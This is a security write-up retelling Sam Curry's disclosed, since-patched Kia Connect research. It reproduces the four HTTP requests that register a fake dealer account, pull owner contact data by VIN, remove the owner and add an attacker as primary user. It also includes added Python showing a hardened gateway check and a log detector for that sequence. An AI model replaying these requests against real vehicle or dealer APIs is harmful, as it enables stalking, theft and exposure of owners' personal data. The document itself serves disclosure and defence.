How You Can Hack and Take Over a Car in 30 Seconds: Lessons from Sam Curry’s Research

In June 2024, Sam Curry uncovered a series of significant security vulnerabilities in Kia vehicles, which enabled attackers to remotely control essential vehicle functions using just a license plate number. These vulnerabilities were so severe that they could be exploited in under 30 seconds on any Kia vehicle equipped with the necessary hardware, regardless of whether the car had an active Kia Connect subscription.

Beyond gaining control of the vehicle, attackers could also quietly retrieve personal details such as the owner’s name, phone number, email, and physical address. This would allow them to add themselves as an unnoticed secondary user on the victim’s vehicle, all without the owner’s knowledge.

To demonstrate the potential risks of these vulnerabilities, Curry’s team developed a tool that allowed an attacker to input a Kia vehicle’s license plate and execute commands on the car in about 30 seconds. However, the tool was never made publicly available, and Kia has since patched these issues. The Kia team also verified that there had been no malicious exploitation of these vulnerabilities.

Discovering Vulnerabilities in Kia’s System

Two years prior, Sam Curry collaborated with other hackers to investigate vulnerabilities across a wide range of car manufacturers. In their efforts, they identified significant security flaws that could enable attackers to remotely access various vehicle functions, such as locating, disabling, unlocking, or even starting an estimated 15.5 million vehicles.

With so much time passing since that discovery, Curry’s team revisited several of the companies involved, starting with Kia, to see if new vulnerabilities had emerged.

Their initial examination focused on the owners.kia.com website and Kia’s Connect iOS app, com.myuvo.link. Both systems were of particular interest due to their ability to send commands to vehicles over the internet.

Despite the website and mobile app serving the same purpose, their internal mechanisms for processing commands were different. The website relied on a backend reverse-proxy to pass user commands to the api.owners.kia.com backend, which was responsible for executing the commands. On the other hand, the mobile app directly communicated with this API.

Below is a real example of an HTTP request that demonstrates how the owners.kia.com website would proxy a request to the api.owners.kia.com backend to unlock a vehicle’s door:

HTTP Request to Unlock Car Door on the “owners.kia.com” website

POST /apps/services/owners/apigwServlet.html HTTP/2
Host: owners.kia.com
Httpmethod: GET
Apiurl: /door/unlock
Servicetype: postLoginCustomer
Cookie: JSESSIONID=SESSION_TOKEN;

Once this request was made, the Kia backend generated a session ID that authenticated the user through the JSESSIONID. The request was then forwarded to the api.owners.kia.com backend in this format:

HTTP Request Formed and Proxied by Server

GET /apigw/v1/rems/door/unlock HTTP/1.1
Host: api.owners.kia.com
Sid: 454817d4-b228-4103-a26f-884e362e8dee
Vinkey: 3ecca1a9-aefd-4188-a7fe-1732e1663d6e

The critical headers in this request were the session token and the unique vehicle identifier (Vinkey). While additional headers were included, these two were key to gaining control over vehicle access. Both requests stemmed from the same areas that had exhibited vulnerabilities in Kia’s system back in 2023.

Since Curry’s team was already well-versed in the user-side mechanics, they then turned their attention to analyzing the Kia Dealer website.

Targeting the Kia Dealer Infrastructure

One area that Sam Curry and his team had not previously explored was how Kia handled vehicle activations for new purchases. After discussing with a few contacts, they discovered that Kia typically requested customers’ email addresses at the dealership to send a registration link. This link could be used to either create a new Kia account or add a newly purchased vehicle to an existing account.

Curry’s team asked the contacts if they could share the registration links they had received, and they were able to get the following page:

This was intriguing because the kiaconnect.kdealer.com domain was completely new to the team. Upon opening the link, they were presented with a sign-in page for a Kia Owners Account.

The token parameter in this URL, also known as the VIN Key, was an access token generated by Kia dealers. It was a one-time grant used to modify the vehicle associated with the VIN parameter in the URL. After loading this URL, the following HTTP request was sent to verify the token’s validity:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com

{
"token": "985a49f0-1fe5-4d36-860e-d9b93272072b",
"vin": "5XYP3DHC9NG310533",
"scenarioType": 3,
"loginPref": null
}

The HTTP request sent to validate the one-time access token was very similar to the ones they had previously encountered on owners.kia.com. However, this request was directed to the Kia Connect dealer system, likely indicating that the dealer infrastructure used a similar reverse-proxy to handle API commands internally for dealership functionalities.

The team then delved deeper into the JavaScript code of the website, specifically looking for interesting API gateway calls. This search uncovered what appeared to be functionalities restricted to dealer employees, such as vehicle lookup, account management, and enrollment. Among these was a vehicle lookup function:

dealerVehicleLookUp() {
  this.displayLoader = true;
  // Outside the eDelivery flow the VIN is taken from the form with whitespace stripped.
  this.vinToEnroll = this.entryPoint != "eDelivery" ? this.vinToEnroll.replace(/\s/g, "") : this.userDetails.vin;
  if (this.vinToEnroll.length != 17) return;   // only a 17-character VIN is looked up
  this.landingPageService.postOffice({ vin: this.vinToEnroll }, "/dec/dlr/dvl", "POST", "postLoginCustomer").subscribe(i => {
    if (!i) return;
    if (i.hasOwnProperty("body") && i.body.status.statusCode == "0") {
      this.processDvlData(i.body);                       // lookup succeeded
    } else if (i.body.status.errorCode == "1003" && this.entryPoint == "kia-dealer") {
      this.reRouteSessionExpire();                       // session key invalid or expired
    } else {
      this.displayLoader = false;
      this.alertMessage = i.body.status.errorMessage;
      document.getElementById("triggerGeneralAlertModal").click();
    }
  });
}

To test if these endpoints could be accessed, Curry’s team attempted an HTTP request to the dealer API endpoint with a dealer token (passed in the Appid header) and the VIN number of a vehicle they owned:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /dec/dlr/dvl

{
"vin": "1HGBH41JXMN109186"
}

Unfortunately, the server responded with a 401 Unauthorized error, indicating that the session key was either invalid or expired:

HTTP/1.1 401 Unauthorized
Content-type: application/json

{
"status": {
"statusCode": 1,
"errorType": 1,
"errorCode": 1003,
"errorMessage": "Session Key is either invalid or expired"
}
}

This response indicated that the dealer endpoints did not recognize the access token provided via email when purchasing a new vehicle, making the token unusable in this scenario.

Curry’s team then decided to revisit their approach. They speculated whether it might be possible to simply register as a dealer, generate an access token, and use that token with the dealer API. Since the kiaconnect.kdealer.com website followed the same API structure as the Kia Owners website, they attempted to create a dealer account using the same registration method:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /prof/registerUser

{
"userCredential": {
"firstName": "Sam",
"lastName": "Curry",
"userId": "[email protected]",
"password": "FakePass123!",
"acceptedTerms": 1
}
}

The registration was successful, returning a 200 OK status, which confirmed that they could create a new dealer account using the same HTTP request process as the Kia Owners website. They quickly logged in and generated a new access token:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /prof/authUser

{
"userCredential": {
"userId": "[email protected]",
"password": "FakePass123!"
}
}

The login was successful, and the server returned an HTTP response with a session cookie:

HTTP/1.1 200 OK
Sid: 123e4567-e89b-12d3-a456-426614174000

Using this session token, Curry’s team sent their generated access token to the previously unauthorized dealer API gateway endpoint to search for a VIN:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Appid: 123e4567-e89b-12d3-a456-426614174000
Apiurl: /dec/dlr/dvl

{
"vin": "1HGBH41JXMN109186"
}

This time, the request was successful, and the server responded with a 200 OK status, returning sensitive vehicle and owner information:

HTTP/1.1 200 OK
Content-type: application/json

{
"payload": {
"billingSubscriptionSupported": 1,
"digitalKeySupported": 0,
"generation": "3",
"profiles": [
{
"address": {},
"billSubscriptionStatus": 1,
"digitalKeyStatus": 0,
"email": "[email protected]",
"enrollmentReqStatus": 1,
"enrollmentStatus": 1,
"firstName": "yeet",
"lastName": "yeet",
"loginId": "[email protected]",
"phone": "4027181388",
"phoneType": 3,
"wifiHotspotStatus": 0
}
],
"vinAddedToAccount": 1,
"wifiHotspotSupported": 1
}
}

By registering and authenticating as a dealer, Curry’s team was able to generate valid access tokens that allowed them to query the backend dealer APIs. These API calls provided sensitive details about the vehicle owner, including their email address, phone number, and other personal data. This successful authentication revealed that their method allowed access to several other dealer endpoints, exposing a wide range of information.
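The gap on the dealer side was an authorization one: the kdealer gateway treated a session from any self-registered account as a dealer session and forwarded whatever Apiurl the client named, including the ownership-changing routes. The following added example is not Kia's code and not from Curry's write-up; it models that gateway in Python over a constructed session store, showing a permissive authorizer that mirrors the behaviour described above beside a hardened one that restricts the dealer routes named on this page to a verified dealer role and requires a dealer-issued, VIN-bound, single-use token for any ownership change. The session ids, e-mail addresses, route groupings and token lifetime are assumptions.

```python
from dataclasses import dataclass, field
import secrets
import time

# Constructed session store (sid -> principal). The dealer role is granted out of band by
# dealer onboarding, never by self-service /prof/registerUser; the permissive gateway
# below never looks at it, which is the gap the write-up describes.
SESSIONS = {
    "123e4567-e89b-12d3-a456-426614174000": {"userId": "attacker@example.com", "role": "customer"},
    "sid-dealer-0001": {"userId": "dlr001@example-dealer.com", "role": "dealer"},
}

DEALER_READ_ROUTES = {"/dec/dlr/dvl"}               # vehicle and owner lookup
OWNERSHIP_ROUTES = {"/dec/dlr/rvp", "/ownr/dicve"}  # remove primary user / add primary user


@dataclass
class Gateway:
    sessions: dict
    enrollment_tokens: dict = field(default_factory=dict)  # token -> (vin, expiry epoch)
    audit: list = field(default_factory=list)

    def permissive_authorize(self, sid, apiurl, body):
        """Behaviour described above: any live session may call any Apiurl."""
        return sid in self.sessions

    def issue_enrollment_token(self, sid, vin, ttl_seconds=600):
        """A dealer starting an enrollment gets a single-use token bound to one VIN."""
        principal = self.sessions.get(sid)
        if principal is None or principal["role"] != "dealer":
            raise PermissionError("dealer role required to start an enrollment")
        token = secrets.token_urlsafe(24)
        self.enrollment_tokens[token] = (vin, time.time() + ttl_seconds)
        return token

    def hardened_authorize(self, sid, apiurl, body):
        """Role check on dealer routes, plus a VIN-bound single-use token on ownership changes."""
        principal = self.sessions.get(sid)
        if principal is None:
            return False
        if apiurl in (DEALER_READ_ROUTES | OWNERSHIP_ROUTES) and principal["role"] != "dealer":
            return False
        if apiurl in OWNERSHIP_ROUTES:
            # pop() consumes the token whether or not the check passes: one attempt per token
            entry = self.enrollment_tokens.pop(body.get("token", ""), None)
            if entry is None or entry[0] != body.get("vin") or entry[1] < time.time():
                return False
            # Record who changed ownership of which VIN and flag the previous owner for notice,
            # the notification the write-up says the victim never received.
            self.audit.append({"apiurl": apiurl, "vin": body["vin"],
                               "by": principal["userId"], "notify_previous_owner": True})
        return True


def run_demo():
    """Self-registered 'dealer' session against both gateways; returns the decisions."""
    gw = Gateway(dict(SESSIONS))
    attacker = "123e4567-e89b-12d3-a456-426614174000"
    lookup = {"vin": "5XYRK4LFXMG016215"}
    return {
        "permissive_lookup": gw.permissive_authorize(attacker, "/dec/dlr/dvl", lookup),
        "hardened_lookup": gw.hardened_authorize(attacker, "/dec/dlr/dvl", lookup),
        "hardened_dealer_lookup": gw.hardened_authorize("sid-dealer-0001", "/dec/dlr/dvl", lookup),
    }
```

The token check is deliberately separate from the role check: even a genuine dealer session cannot reassign a vehicle it has not started an enrollment for, which narrows the blast radius of a compromised dealer account as well as of a self-registered one.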

Gaining Control Over a Victim’s Vehicle

After studying the infrastructure for a few hours, Sam Curry and his team eventually understood how the enrollment, authentication, and modification processes worked. This knowledge allowed them to take over a victim’s vehicle. They identified four critical HTTP requests needed to achieve this:

[Figure: full high-level attack flow]

Below is the step-by-step process used to take control of a victim’s vehicle:

1. Generate the Dealer Token and Retrieve the “Sid” Header from HTTP Responses

To begin, the team generated a dealer account, logged in, and received a valid session token (sid). The request to generate the session token was:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /prof/authUser

{
"userCredential": {
"userId": "[email protected]",
"password": "Fakepass123!"
}
}

2. Fetch the Victim’s Email Address and Phone Number

With the valid session token, the team accessed dealer endpoints to retrieve the victim’s personal information, such as their email and phone number, by making the following request:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /dec/dlr/dvl
Appid: 123e4567-e89b-12d3-a456-426614174000

{
"vin": "VIN"
}

This response revealed the victim’s email and phone number, allowing the attacker to proceed with the next step.

3. Modify the Owner’s Profile to Deny Them Access

Once the victim’s information was retrieved, the next step was to remove the victim as the vehicle’s primary user. This was done through the following HTTP request, which dismissed the owner by using the phone number and email obtained in the previous step:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /dec/dlr/rvp
Appid: 123e4567-e89b-12d3-a456-426614174000

{
"vin": "VIN",
"loginId": "[email protected]",
"dealerCode": "eDelivery"
}

4. Add Attacker to Victim Vehicle

The final step involved assigning the attacker’s email as the primary owner of the victim’s vehicle. This allowed the attacker to send arbitrary commands to the car and assume full control over its functions. The HTTP request used to perform this action was as follows:

POST /apps/services/kdealer/apigwServlet.html HTTP/1.1
Host: kiaconnect.kdealer.com
Httpmethod: POST
Apiurl: /ownr/dicve
Appid: 123e4567-e89b-12d3-a456-426614174000

{
"vin": "5XYRK4LFXMG016215",
"loginId": "[email protected]"
}

By completing this request, the attacker-controlled email was now set as the primary owner of the vehicle. This enabled the attacker to send commands to the car as if they were the legitimate owner.

These four HTTP requests — used to modify ownership and send commands — could be executed on nearly any Kia vehicle manufactured after 2013, with the only requirement being the license plate number of the vehicle.

From the victim’s perspective, there were no notifications or alerts indicating that their vehicle had been accessed or that their permissions had been altered. An attacker could resolve the license plate of a vehicle, enter the associated VIN through the API, and then track the vehicle’s location passively. Furthermore, the attacker could issue active commands, such as unlocking, starting, or honking the vehicle.
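Because the owner gets no notification, the place this sequence is visible is the gateway's own logs: a freshly registered account logs in and then, against a single VIN, calls the lookup, remove-primary and add-primary routes within seconds of each other. The following added detection example is not Kia's code and not from the write-up. It runs that correlation over constructed log lines (one line per proxied call, in an assumed field format) and includes a legitimate dealer enrolling a new vehicle for contrast; the time windows, the log format and the e-mail addresses are assumptions, and the VINs are the ones shown on this page.

```python
from datetime import datetime, timedelta
import re

# Constructed gateway log lines; the format (ts sid userId apiurl vin status) is assumed.
# The first five lines are the four-step takeover from a just-registered account; the
# last three are a real dealer enrolling a newly sold car (lookup, then add primary).
SAMPLE_LOG = """\
2024-06-11T14:00:02Z sid=- userId=attacker@example.com apiurl=/prof/registerUser vin=- status=200
2024-06-11T14:00:09Z sid=123e4567-e89b-12d3-a456-426614174000 userId=attacker@example.com apiurl=/prof/authUser vin=- status=200
2024-06-11T14:00:15Z sid=123e4567-e89b-12d3-a456-426614174000 userId=attacker@example.com apiurl=/dec/dlr/dvl vin=5XYRK4LFXMG016215 status=200
2024-06-11T14:00:21Z sid=123e4567-e89b-12d3-a456-426614174000 userId=attacker@example.com apiurl=/dec/dlr/rvp vin=5XYRK4LFXMG016215 status=200
2024-06-11T14:00:27Z sid=123e4567-e89b-12d3-a456-426614174000 userId=attacker@example.com apiurl=/ownr/dicve vin=5XYRK4LFXMG016215 status=200
2024-06-11T09:12:40Z sid=sid-dealer-0001 userId=dlr001@example-dealer.com apiurl=/prof/authUser vin=- status=200
2024-06-11T09:14:02Z sid=sid-dealer-0001 userId=dlr001@example-dealer.com apiurl=/dec/dlr/dvl vin=1HGBH41JXMN109186 status=200
2024-06-11T09:31:55Z sid=sid-dealer-0001 userId=dlr001@example-dealer.com apiurl=/ownr/dicve vin=1HGBH41JXMN109186 status=200
"""

LINE_RE = re.compile(r"^(\S+) sid=(\S+) userId=(\S+) apiurl=(\S+) vin=(\S+) status=(\d+)$")
# The ordered route sequence that reassigns a vehicle (steps 2, 3 and 4 above).
TAKEOVER_SEQUENCE = ["/dec/dlr/dvl", "/dec/dlr/rvp", "/ownr/dicve"]


def parse(log_text):
    """Turn log lines into event dicts; lines that do not match the format are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, sid, user, apiurl, vin, status = m.groups()
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "sid": sid,
                       "user": user, "apiurl": apiurl, "vin": vin, "status": int(status)})
    return events


def find_takeovers(events, window=timedelta(minutes=10), new_account_age=timedelta(hours=24)):
    """Flag (user, vin) pairs that ran the full lookup -> remove -> add sequence.

    Two independent signals are scored: the sequence completing inside `window`, and the
    acting account having been registered less than `new_account_age` before the change.
    """
    registered = {e["user"]: e["ts"] for e in events
                  if e["apiurl"] == "/prof/registerUser" and e["status"] == 200}
    by_key = {}
    for e in events:
        if e["status"] == 200 and e["vin"] != "-":
            by_key.setdefault((e["user"], e["vin"]), []).append(e)

    alerts = []
    for (user, vin), evs in by_key.items():
        evs.sort(key=lambda e: e["ts"])
        idx, first_ts, last_ts = 0, None, None
        for e in evs:  # walk the events looking for the sequence in order
            if idx < len(TAKEOVER_SEQUENCE) and e["apiurl"] == TAKEOVER_SEQUENCE[idx]:
                first_ts = first_ts or e["ts"]
                last_ts = e["ts"]
                idx += 1
        if idx < len(TAKEOVER_SEQUENCE):
            continue  # sequence never completed (e.g. a normal new-car enrollment has no rvp)
        reasons = []
        elapsed = last_ts - first_ts
        if elapsed <= window:
            reasons.append(f"lookup->remove->add on one VIN in {int(elapsed.total_seconds())}s")
        reg = registered.get(user)
        if reg is not None and last_ts - reg <= new_account_age:
            reasons.append("account registered less than 24h before the ownership change")
        if reasons:
            alerts.append({"user": user, "vin": vin, "at": last_ts.isoformat(),
                           "severity": "high" if len(reasons) == 2 else "medium", "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_takeovers(parse(SAMPLE_LOG)):
        print(alert)
```

The sequence match alone would also catch a dealer reassigning a used vehicle, which is why the account-age signal is kept separate and only the combination is rated high; in production the same correlation would be keyed on the account rather than the session, since the attacker can mint a new sid per step.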

The seriousness of these vulnerabilities was immediately apparent to Sam Curry’s team, and they reported the findings to Kia. While Kia worked on a fix, the team created a proof-of-concept dashboard to demonstrate the impact of the vulnerability more effectively.

License Plate Takeover Proof of Concept

The goal of the proof of concept UI was straightforward: to build a dashboard where an attacker could input the license plate of a Kia vehicle, retrieve the owner’s personal information, and execute commands on the vehicle.

Since the attack involved adding the victim’s vehicle to an attacker-controlled account, Curry’s team structured the PoC to include two main pages: the Exploit page and the Garage page. The Exploit page was used to take over vehicles, while the Garage page allowed the attacker to issue commands and track the vehicles once they were compromised.

Here’s how the PoC functioned:

  • License Plate to VIN: The PoC used a third-party API to convert the license plate number into the corresponding VIN (Vehicle Identification Number).
  • Takeover Button: This button executed the four-step process required to take control of a vehicle, using the VIN retrieved from the license plate. The process involved generating a dealer token via the login form, retrieving the victim’s email and phone number, demoting the vehicle’s original owner to an account holder, and assigning the attacker as the primary account holder.
  • Fetch Owner Button: This button passively retrieved the victim’s personal information, including their name, email address, and phone number.
  • Garage Tab: Once a vehicle was compromised, the Garage tab allowed the attacker to list the vehicles under their control and issue commands like unlocking, starting, or locating the vehicles.

After developing this tool, the team recorded a proof-of-concept video using a locked rental Kia. In the video, they demonstrated how the attack worked by taking over the vehicle through their phone and then remotely locking/unlocking, starting/stopping, honking, and locating the vehicle. This video is included at the beginning of the blog post to showcase the attack.

[Video captions: Hacking a car using just the license plate; Executing commands on the compromised vehicle]

Sam Curry and the other hackers’ research exposed critical vulnerabilities in Kia’s infrastructure that allowed remote vehicle takeovers using just a license plate number. While Kia has since fixed these issues, this case highlights the importance of securing connected vehicles and the potential risks of API misconfigurations. It serves as a reminder of the need for thorough testing and responsible disclosure to keep modern automotive systems safe from exploitation.

Stay vigilant, stay informed, and stay secure!

Thank You for Reading!
Your interest and attention are greatly appreciated.

Resources:

Hacking Kia: Remotely Controlling Cars With Just a License Plate


Originally published in InfoSec Write-ups on Medium.

Original link: https://infosecwriteups.com/how-you-can-hack-and-take-over-a-car-in-30-seconds-lessons-from-sam-currys-research-4c33247514ef?source=rss----7b722bfd1b8d---4